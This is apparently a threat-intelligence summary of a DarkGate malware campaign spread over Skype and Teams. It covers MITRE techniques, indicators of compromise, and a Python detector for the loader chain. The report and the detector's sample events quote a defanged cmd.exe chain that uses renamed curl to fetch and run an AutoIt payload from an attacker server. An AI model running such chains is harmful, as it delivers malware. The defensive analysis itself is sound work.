DarkGate Opens Organizations for Attack via Skype, Teams

Trend Micro observed a campaign that uses compromised Skype and Microsoft Teams accounts to deliver a VBA/VBS loader which retrieves an AutoIt-based DarkGate payload. The chain abuses renamed/obfuscated binaries (curl.exe), AutoIt scripts (.au3), and LNK shortcuts for execution and persistence. #DarkGate #AutoIt

Keypoints

  • From July–September, attackers used compromised Skype and Teams accounts to send malicious attachments (VBS/VBA and .LNK) that masquerade as PDF files or trusted supplier documents.
  • Initial loader is a VBS/VBA script (executed via wscript.exe) that creates a random directory, copies curl.exe to a random-named executable, and uses it to download AutoIt3.exe and a malicious .au3 script.
  • The campaign hosts payloads on a remote server (reactervnamnat[.]com) and runs cmd.exe to execute chained commands that retrieve and launch AutoIt and the DarkGate AU3 payload.
  • The compiled AutoIt (.au3) performs environment checks, decrypts and executes the DarkGate payload, then spawns legitimate-looking processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) and injects shellcode to run in memory.
  • Persistence is achieved by dropping a randomly named .lnk file in the user Startup folder and storing encrypted logs/configs under %ProgramData% in randomly named directories.
  • Post-install activity includes dropping additional payloads (DarkGate/Remcos variants) under C:\Intel and %appdata%\Adobe to expand foothold; sample names include Folkevognsrugbrd.exe and logbackup_0.exe.

MITRE Techniques

  • [T1566] Phishing – Initial access via messages from compromised Skype/Teams accounts with malicious attachments to trick recipients into opening files (‘the threat actor abused a trusted relationship between the two organizations to deceive the recipient into executing the attached VBA script.’).
  • [T1204] User Execution – Victims are socially engineered to run VBS/VBA or LNK files masquerading as PDFs (‘the message containing a deceptive VBS script with a file name … tricks the user into believing the file is a .PDF document’).
  • [T1059.005] Command and Scripting Interpreter: VBScript – The VBA/VBS loader executes via wscript.exe and runs cmd.exe chains to perform download and execution (‘Trend Vision One™ detected the loading of the VBA script via its execution using the Windows native wscript.exe’).
  • [T1105] Ingress Tool Transfer – Use of curl (renamed copy) to download AutoIt3.exe and the malicious .au3 script from reactervnamnat[.]com (‘zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz’).
  • [T1055] Process Injection – The AU3 payload injects shellcode into surrogate processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) to run DarkGate in memory (‘These are injected with shellcode to execute the DarkGate payload in memory.’).
  • [T1547.001] Boot or Logon Autostart Execution – Persistence via a randomly named .lnk file dropped to the Windows User Startup folder to auto-run on login (‘dropping a randomly named LNK file to the Windows User Startup folder, enabling automatic execution’).
  • [T1027] Obfuscated Files or Information – The campaign uses obfuscated command lines and AutoIt compilation to hinder analysis (‘addition of obfuscation to its command lines’).

Indicators of Compromise

  • [Domain] hosting and download server – reactervnamnat[.]com (used to serve AutoIt3.exe and malicious .au3 files).
  • [IP] embedded in LNK command – 185.39.18.170 (observed in the obfuscated cmd chain contacting a remote host for hm3.vbs).
  • [Files/Artifacts] loader and script names – hm3.vbs, BzpXNT.au3 (loader VBS and downloaded AutoIt script examples).
  • [File paths] persistence and storage – %ProgramData%\{7char}\{7char}… (random folders for logs and settings) and Startup folder .lnk path (auto-run shortcut in user Startup folder).
  • [Dropped payload names] secondary executables – Folkevognsrugbrd.exe, logbackup_0.exe, and other variants (used to expand foothold; also observed Remcos variants).
  • [Archive/LNK filenames] social engineering lure – Significant company changes September.zip containing Company_Transformations.pdf.lnk and other similarly named .lnk files.

Attackers delivered DarkGate via social-engineered IM messages (Skype and Teams) and SharePoint-hosted ZIPs that contained deceptive attachments: VBS/VBA scripts or .LNK files named to appear as PDFs. The VBS/VBA loader is executed using wscript.exe and immediately creates a randomly named directory, copies the legitimate Windows curl.exe to a randomly named executable, then invokes cmd.exe to run chained commands. One observed command chain used the copied curl to download AutoIt3.exe and a malicious AU3 script and then launched AutoIt to execute that script (example chain: "C:\Windows\System32\cmd.exe" /c mkdir c:\zohn & cd /d c:\zohn & copy C:\windows\system32\curl.exe zohn.exe & zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80 & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz & Autoit3.exe BzpXNT.au3).
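The loader chain above gives a defender several concrete detection hooks: wscript.exe spawning cmd.exe, curl.exe copied under a new name and then used with -o to fetch files, AutoIt3.exe running from a directory outside Program Files, and a double extension that makes a script look like a PDF. The following is an added example (not code from the Trend Micro report) that runs those checks over constructed process-creation events modelled on the published command chain; the event tuples and the benign look-alikes are assumptions built for the demonstration.

```python
import re

# Constructed sample process-creation events (parent image, image, command line),
# modelled on the chain described in the report; not real telemetry from it.
SAMPLE_EVENTS = [
    ("explorer.exe", r"C:\Windows\System32\wscript.exe",
     r"wscript.exe C:\Users\user\Downloads\Invoice.pdf.vbs"),
    ("wscript.exe", r"C:\Windows\System32\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c mkdir c:\zohn & cd /d c:\zohn'
     r" & copy C:\windows\system32\curl.exe zohn.exe"
     r" & zohn -o Autoit3.exe hxxp://reactervnamnat[.]com:80"
     r" & zohn -o BzpXNT.au3 hxxp://reactervnamnat[.]com:80/msimqrqcjpz"
     r" & Autoit3.exe BzpXNT.au3"),
    ("cmd.exe", r"c:\zohn\Autoit3.exe", r"Autoit3.exe BzpXNT.au3"),
    # benign look-alikes that must not fire
    ("explorer.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c copy report.docx D:\backup\ & dir"),
    ("devenv.exe", r"C:\Program Files (x86)\AutoIt3\AutoIt3.exe", r"AutoIt3.exe build.au3"),
]

# curl.exe copied to a differently named file, e.g. "copy ...\curl.exe zohn.exe"
CURL_COPY = re.compile(r"copy\s+\S*curl\.exe\s+(?!curl\.exe\b)\S+", re.I)
# curl-style "-o <file> <url>" download (defanged hxxp:// accepted as well)
CURL_DOWNLOAD = re.compile(r"\s-o\s+\S+\s+(?:hxxps?|https?)://", re.I)
# double extension that makes a script or shortcut look like a PDF
FAKE_PDF = re.compile(r"\.pdf\.(?:vbs|vba|lnk)\b", re.I)

def score_event(parent, image, cmdline):
    """Return the list of reasons this event matches the DarkGate loader chain."""
    reasons = []
    img = image.lower()
    if parent.lower() == "wscript.exe" and img.endswith(r"\cmd.exe"):
        reasons.append("cmd.exe spawned by wscript.exe")
    if CURL_COPY.search(cmdline) and CURL_DOWNLOAD.search(cmdline):
        reasons.append("renamed copy of curl.exe used to download")
    if img.endswith(r"\autoit3.exe") and not img.startswith(r"c:\program files"):
        reasons.append("AutoIt3 launched from outside Program Files")
    if FAKE_PDF.search(cmdline):
        reasons.append("script/shortcut masquerading as PDF")
    return reasons

def flag_events(events):
    """Return (index, reasons) for every event that matched at least one rule."""
    hits = []
    for i, ev in enumerate(events):
        reasons = score_event(*ev)
        if reasons:
            hits.append((i, reasons))
    return hits

if __name__ == "__main__":
    for i, reasons in flag_events(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i][2][:60], reasons)
```

The two benign events (a plain file copy and AutoIt3 run from its normal install path) are included so the rules can be checked for false positives before being adapted to real EDR or Sysmon fields.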

The compiled AutoIt (.au3) performs environment checks (ensuring %ProgramFiles% exists and the username is not SYSTEM), decrypts and loads the DarkGate payload, then spawns legitimate-sounding surrogate processes (iexplore.exe, GoogleUpdateBroker.exe, Dell.D3.WinSvc.UILauncher.exe) and injects shellcode into them to execute the payload in memory. For persistence, the malware drops a randomly named .lnk file into the user’s Startup folder and creates a randomly named ProgramData directory to store encrypted logs and configuration files (paths use generated seven-character strings). Investigators can use tools such as the Telekom Security extractor to dump DarkGate config files.

After installation DarkGate acts as a downloader, dropping additional payloads (examples: Folkevognsrugbrd.exe, logbackup_0.exe, sdvbs.exe) under C:\Intel and %appdata%\Adobe to diversify access (including observed Remcos variants). The overall technical chain relies on social engineering to trigger user execution, command-shell download/execution via a copied curl binary, AutoIt-based payload execution, in-memory process injection, startup LNK persistence, and encrypted local storage for logs/settings.

Read more: https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html